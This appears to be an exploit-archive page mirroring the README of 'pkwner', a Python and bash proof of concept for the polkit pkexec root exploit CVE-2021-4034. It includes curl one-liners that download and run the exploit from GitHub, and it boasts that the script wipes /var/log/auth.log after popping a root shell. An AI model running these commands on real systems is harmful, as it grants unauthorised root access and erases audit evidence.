Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-4034 PoC — polkit 缓冲区错误漏洞

Source
https://github.com/kimusan/pkwner
Associated Vulnerability
Title:polkit 缓冲区错误漏洞 (CVE-2021-4034)
Description:A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
Description
A python3 and bash PoC for CVE-2021-4034 by Kim Schulz
Readme
```
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz
``` 

# Intro

This is a simple PoC for the newly found Polkit error names [PwnKit](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034).

I made it both as bash and python3 script - just for the fun of it. 

The issue is very simple to abuse but has huge consequences as it will easily give root access on most Linux machines where the attacker has local user access. 

# How to run
This scripts are a one shot execution so simply do
```
python3 pkwner.py
```
or
```
bash pkwner.sh
```
You can also run it directly from a webserver (e.g. this github repo) via:
```
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
```
or
```
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
```

In both cases it should look something like this:
![alt text](https://github.com/kimusan/pkwner/raw/main/screenshot-py.gif "screenshot")
and 
![alt text](https://github.com/kimusan/pkwner/raw/main/screenshot-sh.gif "screenshot")


The script will create some files and folders but will cleanup after itself when the root shell is popped - it will even clean up the /var/log/auth.log (because why not). 

# Credits

- **Qualys** for finding the issue and making the info public
- **Andris Raugulis** for making one of the first PoCs to get inspired from
- **MiscGang** because misgang@[Kalmarunionen](https://kalmarunionen.dk) are baddass
File Snapshot

 [4.0K]  /data/pocs/494633e992f2ad23ae8afbaabb39deb12ecec088
├── [3.6K]  pkwner.py
├── [2.1K]  pkwner.sh
├── [2.3K]  README.md
├── [ 57K]  screenshot.png
├── [ 62K]  screenshot-py.gif
└── [ 53K]  screenshot-sh.gif

0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →